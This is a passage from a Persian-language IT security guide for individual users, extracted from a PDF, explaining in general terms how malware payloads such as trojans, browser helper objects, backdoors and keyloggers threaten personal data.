‫ﻧﻮﻳﺴﻨﺪﺓ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ )ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ( ﺭﺍ ﺑﺨﻮﺍﻧﺪ‪ .‬ﺍﮔﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ‬
‫ﻣﻲ ﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺗﺼﻮﻳﺮﻱ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺗـﺎ ﺍﺯ‬
‫‪Attachment‬‬
‫‪Body‬‬
‫‪Subject Field‬‬
‫‪From Field‬‬
‫‪Email Spoofing‬‬
‫‪42‬‬
‫‪43‬‬
‫‪44‬‬
‫‪45‬‬
‫‪46‬‬
‫‪٧٣‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺁﻥ ﺩﺭ ﭼﺎﭖ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻧﺎﻣﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﺁﻥ ﻫـﻢ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻴﺎﻳﺪ‪ .‬ﺟﻤﻊﺁﻭﺭﻱ ﺍﻳﻦ ﺑﺴﺘﻪ ﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ ﻛﻪ‬
‫ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻫﻮﻳﺖ ﺷﻤﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺗﺠﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮ‬
‫ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﺷـﺪﻥ‬
‫ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺶ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭﺍﻗﻌﹰﺎ ﺁﺳﻴﺐﺭﺳﺎﻥ ﻫﺴﺘﻨﺪ؛ ﺑﻪ ﺍﻳﻦ‬
‫ﺗﺮﺗﻴﺐ ﻛﻪ ﺑﺎ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺩﺍﺩﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺴﺮﻋﺖ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨـﺪ ﻳـﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ‬
‫ﺑﺎ ﺭﻭﺷﻬﺎﻳﻲ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﮔﻔﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪:‬‬
‫ﻧﺼﺐ ﻳﻚ ﺗﺮﻭﺍ‬
‫ﺍﻳﻦ ﻋﻤﻠﻜﺮﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺴﻴﺎﺭ ﺭﺍﻳـﺞ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻻ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻧﺼﺐ ﺷـﺪﻩ ﻭ ﻟـﺬﺍ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺨﺮﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺷـﻤﺎ ﻳـﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺍﺯ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷـﻮﺩ )ﻣﻌﻨـﺎﻱ ﺍﺻـﻠﻲ ﺗـﺮﺍﻭﺍ(‪ .‬ﺍﺯ‬
‫ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ‬
‫ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ ﻳـﺎ ﻫﻨﮕـﺎﻡ ﺭﻭﺷـﻦ‬
‫ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪ .‬ﺩﺭ ﺑﺨـﺶ "ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺳـﺮﺑﺎﺭ"‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺯﻣﺎﻧﺒﻨﺪﻱ ﺑﺮﺍﻱ ﺁﻳﻨﺪﻩ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﮔﻔﺘﻪ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻼﻓﺎﺻﻠﻪ ﺍﺗﻔﺎﻕ‬
‫ﺑﻴﻔﺘﻨﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﻭﻗﻮﻉ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜـﺎﻝ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷـﻨﺪ‬
‫ﻛﻪ ﺍﻋﻼﻡ ﺷﻮﺩ ﻳﻚ ﻛﺮﻡ ﺧﺎﺹ ﺩﺭ ﺭﻭﺯﻫﺎﻱ ﺍﻭﻟﻴﺔ ﮊﺍﻧﻮﻳـﺔ ﺳـﺎﻝ‬
‫‪ ۲۰۰۰‬ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺰﺭﮒ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺮﺑﺎﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺩﻳﺎﺑﻲ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮ ﺩﺭ ﺷﺒﻜﻪ‬
‫‪٤٨‬‬
‫ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴـﺪ ﺭﺍ‬
‫ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻼﻭﻩ ﺑﺮ ﺁﻧﭽﻪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ ﺣﺎﻟـﺖ‬
‫ﻣﻌﻤﻮﻝ ﻣﺸﺎﻫﺪﻩ ﻣـﻲ ﻛﻨﻴـﺪ ﺻـﻔﺤﺎﺕ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬
‫ﺩﺭﺁﻭﺭﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﺳﺖ ﺭﺍ ﺑـﺎ‬
‫ﺗﺒﻠﻴﻐﺎﺕ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ‬
‫ﻭ ﺗﻌــﺎﻣﻼﺗﻲ ﻛــﻪ ﺑــﺎ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﺓ ﺁﻥ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩﺍﻳــﺪ ﺑــﺮﺍﻱ‬
‫ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺧﻮﺩ ﺑﻔﺮﺳﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ‬
‫ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﺑﺮ ﺭﻭﻱ ﻣﺮﻭﺭﮔﺮ ﺷـﻤﺎ ﻫـﺴﺘﻨﺪ‪ :‬ﺁﻧﭽـﻪ ﻭﺍﺭﺩ‬
‫ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽـﻪ ﻛـﻪ ﻣـﻲﺑﻴﻨﻴـﺪ ﺭﺍ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﺎﻫﺪﺍﺕ ﺷﻤﺎ ﺭﺍ ﺗﺤـﺖ ﻧﻈـﺮ ﺩﺍﺭﻧـﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﻣﻘﺼﺪ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬
‫ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ‪ .‬ﺩﺭ ‪ ،Internet Explorer‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻃﺮﺍﺣﻲ‬
‫ﺷﺪﻩ ﻭ ‪ ٤٩BHO‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮﭼﻪ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧـﺪ ‪BHO‬ﻫـﺎﻱ‬
‫ﺳﺎﻟﻢ ﻭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪﻱ ﺭﺍ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ ،‬ﺍﻣﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺍﺧﻼﻗﻴﺎﺕ ﺩﺭ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺭﻋﺎﻳـﺖ ﺷـﺪﻩ‬
‫ﻧﻴﺰ ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ‬
‫‪٥٠‬‬
‫ﻻ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺎﺯ ﺑـﻪ ﻭﺍﺭﺩ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺮﺩﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺩﺍﺭﻳـﺪ؛ ﺍﮔﺮﭼـﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺍﻳﻤﻦ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺷـﺨﺎﺹ ﺧﺎﺻـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﭘـﺸﺖ‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻧﺮﻡﺍﻓـﺰﺍﺭ "ﺩﺭﺏ‬
‫ﻣﺨﻔﻲ" ﺑﺎ ﺑﻲﺍﺛﺮ ﻛﺮﺩﻥ ﻛﻠﻴﺔ ﺣﻔﺎﻇﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ‪ ٥١‬ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﻫـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻛﺎﺭ ﺑﮕﺬﺍﺭﺩ‬
‫ﺗﺎ ﺗﻨﻬﺎ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬
‫ﺍﻳﻦ ﺟﺰﺋﻴﺎﺕ ﺍﺯ ﻳﻚ ﻣﻮﺭﺩ ﺗﺎ ﻣـﻮﺭﺩ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ‬
‫‪٤٧‬‬
‫ﻻ ﺑﻪ ﺷﻜﻞ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻇﺎﻫﺮ ﻣﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﻲﻧﺸﻴﻨﺪ ﻭ ﺯﻣﺎﻧﻲﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺭﻭﺷـﻦ ﻳـﺎ‬
‫‪Payload Software‬‬
‫‪47‬‬
‫‪Web Tracking/Modification Software‬‬
‫ ‪Browser Helper Object‬‬‫‪http://msdn.microsoft.com/library/enus/dnweb‬‬
‫‪gen/html/bho.asp‬‬
‫‪Backdoors‬‬
‫‪Remote User‬‬
‫‪48‬‬
‫‪49‬‬
‫‪50‬‬
‫‪51‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ‬
‫ﺑﺮﻧﺎﻣﺔ ﺧﺎﺻـﻲ ﺭﺍ ﺁﻏـﺎﺯ ﻣـﻲﻛﻨﻴـﺪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳـﺪ‪ .‬ﺗﻨﻬـﺎ‬
‫ﻣﺤﺪﻭﺩﻳﺘﻲ ﻛﻪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‬
‫ﺗﺼﻮﺭﺍﺕ ﻭ ﻣﻬﺎﺭﺕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻧﻬﺎ ﺍﺳﺖ‪.‬‬
‫‪٧٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﭘﻴﺪﺍ‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺍﮔـﺮ ﺑﺨﻮﺍﻫﻨـﺪ‪،‬‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺍﺩﺍﻣﺔ ﻛﺎﺭﺗﺎﻥ ﺑﺎﺯﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ‬
‫ﺗﺤﺖ ﻓﺮﻣﺎﻥ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻳﺪ‪ .‬ﺍﻣﺎ ﺳﺆﺍﻟﻲ ﻛﻪ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭼـﺮﺍ‬
‫ﻣﻬﺎﺟﻢ ﻣﺎﻳﻞ ﺍﺳﺖ ﻛﻨﺘﺮﻝ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺩﺳـﺖ ﺑﮕﻴـﺮﺩ؟‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﺍﻳﻨﻜﻪ‪:‬‬
‫•‬
‫ﻫﻴﭻ ﺩﻟﻴﻠﻲ ﻏﻴﺮ ﺍﺯ ﺍﺛﺒﺎﺕ ﺗﻮﺍﻧﺎﻳﻲ ﺧﻮﺩ ﺑﻪ ﺩﻭﺳﺘﺎﻧﺶ ﺑﺮﺍﻱ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻛﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﻮﺍﻫﺪ ﺗﺨﺮﻳﺒﮕﺮ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﺑﺮﺍﻱ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﻤﺎ ﺩﻟﻴﻞ ﺷﺨﺼﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣﺨـﺮﺏ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ؛ ﻣﺜﻞ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ‬
‫ﺳﺮﻭﻳﺲ )‪ ٥٢(DoS‬ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ؛ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ‬
‫•‬
‫ﺑﺨﻮﺍﻫﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺷﻲ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺎﺭﺑﺮﺩ ﻣـﺸﺎﺑﻪ ﺗﺤـﺖ‬
‫ﻋﻨــﺎﻭﻳﻨﻲ ﭼــﻮﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺭﺍﻩ ﺩﻭﺭ‪ ٥٣‬ﻳــﺎ ﺍﺑﺰﺍﺭﻫــﺎﻱ‬
‫ﺭﺍﻫﺒﺮﻱ ﺭﺍﻩ ﺩﻭﺭ‪ ٥٤‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺮﻭﻉ ﻭ ﺑـﺴﻴﺎﺭ ﻭ ﭘﺮﺍﺳـﺘﻔﺎﺩﻩﺍﻱ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﻛـﺎﺭﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻧﻨﺪ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ‪.‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ‬
‫‪٥٥‬‬
‫ﻣﻔﻬﻮﻡ "ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ" ﺍﺯ ﻧﺎﻡ ﺁﻥ ﻣﺸﺨﺺ ﺍﺳﺖ‪ .‬ﺁﻧﻬﺎ ﺗﻤـﺎﻣﻲ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻓﺸﺮﺩﻩ ﺷﺪﺓ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﺍ ﺛﺒـﺖ ﻭ ﺩﺭ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺎﻳﻞ ﻣﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺁﻳﻨـﺪﻩ ﺑـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺩﺭﺏ ﻣﺨﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ‪.‬‬
‫ﺷﺎﻳﺎﻥ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﻭﺍﻗﻌـﹰﺎ‬
‫ﺗﺎﻳﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺁﻧﭽﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ‬
‫ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎﺭﺓ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺭﺍ‬
‫‪Denial of Service Attack‬‬
‫‪Remote Access Tools‬‬
‫‪Remote Administration Tools‬‬
‫‪Keyloggers‬‬
‫‪52‬‬
‫‪53‬‬
‫‪54‬‬
‫‪55‬‬
